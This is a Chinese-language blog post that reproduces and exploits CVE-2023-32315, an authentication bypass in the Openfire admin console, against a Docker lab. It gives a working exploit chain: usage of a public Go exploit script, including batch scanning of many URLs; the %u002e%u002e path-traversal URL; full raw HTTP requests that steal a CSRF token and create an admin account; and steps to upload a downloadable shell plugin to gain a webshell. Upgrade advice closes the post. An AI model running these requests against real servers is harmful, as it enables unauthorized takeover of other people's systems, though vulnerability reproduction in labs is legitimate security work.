Openfire身份认证绕过漏洞复现+利用(CVE-2023-32315)

已于 2023-11-24 02:20:20 修改
阅读量8.4k 收藏 27
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2023-06-15 15:56:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/131226136
版权

0x01 产品简介

      Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。Openfire安装和使用都非常简单,并利用Web进行管理。单台服务器甚至可支持上万并发用户。

0x02 漏洞概述

      Openfire的管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。   

0x03 影响范围

    3.10.0 <= Openfire < 4.6.8

    4.7.0 <= Openfire 4.7.x < 4.7.5

0x04 复现环境

    docker搭建Openfire 4.7.4漏洞环境

  拉取镜像

docker pull nasqueron/openfire:4.7.4

e7376eb608644f2fb38b13cab1b21e0f.png

 启动环境

docker run --name openfire -d --restart=always \
  --publish 9090:9090 --publish 5222:5222 --publish 7777:7777 \
  --volume /srv/docker/openfire:/var/lib/openfire \
  nasqueron/openfire:4.7.4

5208ae6e9d084c75b52fdbeac8e3edfc.png

访问环境,需要安装,一直下一步即可 

ebc741c4d344448da0e4f7bdb22eb354.pngbab08a014b8a435ab4e1590d47f52c5c.png

 安装完毕

0x05 漏洞复现

 Exp脚本:https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass

44710a9a32c04a03ae23eb52b7219438.png

使用方法:Get项目到有go环境的主机(go版本1.20以上)

cd CVE-2023-32315-Openfire-Bypass/scan_all    
go mod tidy                                #编译脚本获取依懒

单url利用姿势

go run main.go -u http://openfire.com:9090

多url利用姿势

go run main.go -l url.txt -t 20

效果(可直接创建用户名密码)

40111d75feea43d3b606f17b8ebe461c.png

手动复现

/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

3ee5b2b53d2a48e9ae8fb034a7b66a45.png

出现这种情况,证明漏洞存在

获取JSESSIONID和csrftoken

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

6a0dac24c84442709dd11c8ebd131d98.png

 使用获取到JSESSIONID和csrftoken创建用户

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=I5Mh5Zl1DK2qBGT&username=test123&name=&email=&password=test123&passwordConfirm=test123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=node01q1zp5igpjjwd1fd25m8atvtmz12.node0; csrf=I5Mh5Zl1DK2qBGT
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

9481aeb836a64e7eac877f1a71fff50c.png

 尝试登录

33a60913c19a469c9cf7abdb357dd195.png

3067a2d634be4afea73e87561a057ded.png

 0x06 漏洞利用

上传openfire shell命令行插件

  插件地址:

https://download.csdn.net/download/qq_41904294/87912035

26aa042c2cdf44be83aee16706911623.png

4a18ac255bfd462b81cb8d79dde0f2eb.png061e7a9f836246ddb7e541a4b1423eb0.png

密码"123"点击登录

9fafce9131554a56ad5066a9f34fd371.png

87045deb5d2149ba84659e4c80b7a48a.png

得到webshell 

 0x07 修复建议

升级版本至4.6.8或4.7.5及以上

https://github.com/igniterealtime/Openfire/releases

限制网络访问,切勿将 Openfire 管理控制台暴露于互联网,使用网络安全措施,确保只有受信任成员才能访问。

 

 

 

 

0xSecl
关注
  • 7
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
订阅专栏
【1day】复现Openfire 权限绕过漏洞CVE-2023-32315
记录并分享学习安全的知识点..
07-17 433
Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。 Openfire安装和使用都非常简单,并利用Web进行管理。单台服务器甚至可支持上万并发用户。由于Openfire的路径名限制不恰当,未经身份认证的远程攻击者可以构造恶意请求利用漏洞,成功利用漏洞可以绕过身份认证登录管理界面。
CVE-2023-32315-Openfire-Bypass-main.zip
07-17
复现CVE-2023-32315
Goby 漏洞发布|Ignite Realtime Openfire 权限绕过漏洞CVE-2023-32315
m0_46699477的博客
06-21 705
maxView Storage Manager 是一款企业存储和通信解决方案的管理系统。maxView Storage Manager 存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。maxView Storage Manager 存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。
漏洞复现学习:openfire鉴权绕过漏洞复现CVE-2024-32315)_openfireadministrationconsole(1)
最新发布
m0_59117112的博客
04-16 434
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CVE-2023-32315Openfire管理控制台身份验证绕过到RCE的复现
薛定谔嘚喵博客
09-01 1483
在 4.7.4 和 4.6.7 之前的版本中,发现 Openfire 的管理控制台(管理控制台)是一个基于 Web 的应用程序,容易受到通过设置环境进行的路径遍历攻击。这允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 设置环境来访问为管理用户保留的 Openfire 管理控制台中的受限页面。
每日一漏洞CVE-2023-32315
jjjj1029056414的博客
07-09 467
openfire路径穿越漏洞
Openfire管理后台认证绕过漏洞CVE-2023-32315)vulhub复现
qq_53003652的博客
07-11 1211
虽然这个请求的响应包中包含异常,但实际上新用户已经被创建,账号密码均为。现在使用UTF-16绕过该防护。直接使用创建的新用户登录后台。抓包,发送如下数据包。
漏洞分析 | Ignite Realtime Openfire 路径遍历漏洞(CVE-2023-32315)
WangsuSecurity的博客
08-25 479
Openfire存在认证绕过漏洞,未经身份认证的远程攻击者可以构造恶意请求访问受限界面,最终上传恶意文件实现远程代码执行。
openfire-instlink:instlink服务器源码= openfire +扩展功能-服务器
03-24
openfire-instlink编译编译前注意修改build / build.xml中的相关配置,然后ant build扩展其中pubsub模块是针对instlink的分组功能进行的扩展。包括了群聊天和群共享等功能。
Android应用源码之AdXmpp(Openfire+asmack+spark)-IT计算机-毕业设计.zip
04-06
Android应用源码开发Demo,主要用于毕业设计学习。
openfire-4.3.0-1.x86_64
01-13
openfire-4.3.0-1.x86_64.rpm, 为CentOS 安装 提供,开发即时消息使用
Openfire CVE-2023-32315(metasploit版)
m0_73605862的博客
12-06 547
首先,打开metasploit,然后查询需要攻击的板块,利用板块。进入到板块以后,我们需要查看配置信息,并且对端口,host,ssl,版本,payload等进行更改。然后修改完成以后,进行攻击。得到shell以后,验证成功。Step3:打开mysql和apache2,访问特定端口,然后靶标应用。Step2:docker查看映射端口。step1:用docker搭建环境。
漏洞分析|openfire web管理员控制台验证绕过漏洞(CVE-2023-32315)
xuandaoren的博客
11-27 369
其中,builder用于存储解码后的路径字符串,如果遇到%,会检查builder是否为null,如果是的话,就说明还没有解码过任何字符,需要先将%前面的字符拷贝到builder中,这样做的目的是保证解码后的uri路径完整。因为匹配到excludes存在的setup/setup-*,进入url检测,这里已经对”..”以及”%2e”进行了过滤,所以普通的路径遍历特征都会被拦截,但新版本中的Jetty Web服务器支持对%u002e这类非标准unicode uri的解析,也就又给攻击者提供了一种利用方式。
【高危】Openfire权限绕过漏洞(POC公开)
murphysec的博客
06-26 770
Openfire是Java开发且基于XMPP(前称Jabber,即时通讯协议)的开源实时协作(RTC)服务器。在受影响版本中,由于路径验证机制存在缺陷,攻击者可以通过/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp形式的URL绕过访问控制,未授权访问后台页面,并进一步利用安装插件功能远程执行任意代码。
Openfire漏洞CVE-2019-18393/18394)
公众号shadow sock7
08-05 5267
77@ubuntu129:~/repos$ wget https://github.com/igniterealtime/Openfire/releases/download/v4.4.2/openfire_4.4.2_all.deb 77@ubuntu129:~/repos$ sudo dpkg -i openfire_4.4.2_all.deb Selecting previously unselected package openfire. (Reading database ... 332004
WuThreat身份安全云-TVD每日漏洞情报-2023-03-09
wuthreat无胁科技的博客
03-12 339
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-25356。漏洞编号:CVE-2023-25223。
黑客利用高危 Openfire 漏洞加密服务器
smellycat000的专栏
09-27 160
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士黑客正在利用 Openfire 通讯服务器中的一个高危漏洞,以勒索软件加密服务器并部署密币挖矿机。Openfire 是一款广泛使用的基于 Java 的开源聊天 (XMPP) 服务器,下载次数已达900多万次,广泛应用于多平台的安全聊天通信中。该漏洞的编号是CVE-2023-32315,是影响 Openfire 管理面板的认证绕过漏洞,可导致未认证...
CVE-2023-32315
09-08
CVE-2023-32315是Ignite Realtime Openfire的权限绕过漏洞。这个漏洞允许攻击者绕过Openfire身份认证机制,获取未经授权的访问权限。漏洞的CVSS评分为9.8,表示其严重性很高。 关于CVE-2023-32315的详细信息以及漏洞利用插件,你可以通过Goby社区版进行下载和查看。Goby是一款漏洞扫描和管理工具,你可以使用它来获取更多关于该漏洞的信息以及其他漏洞的历史合集。你还可以关注Goby的公众号获取最新的动态消息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值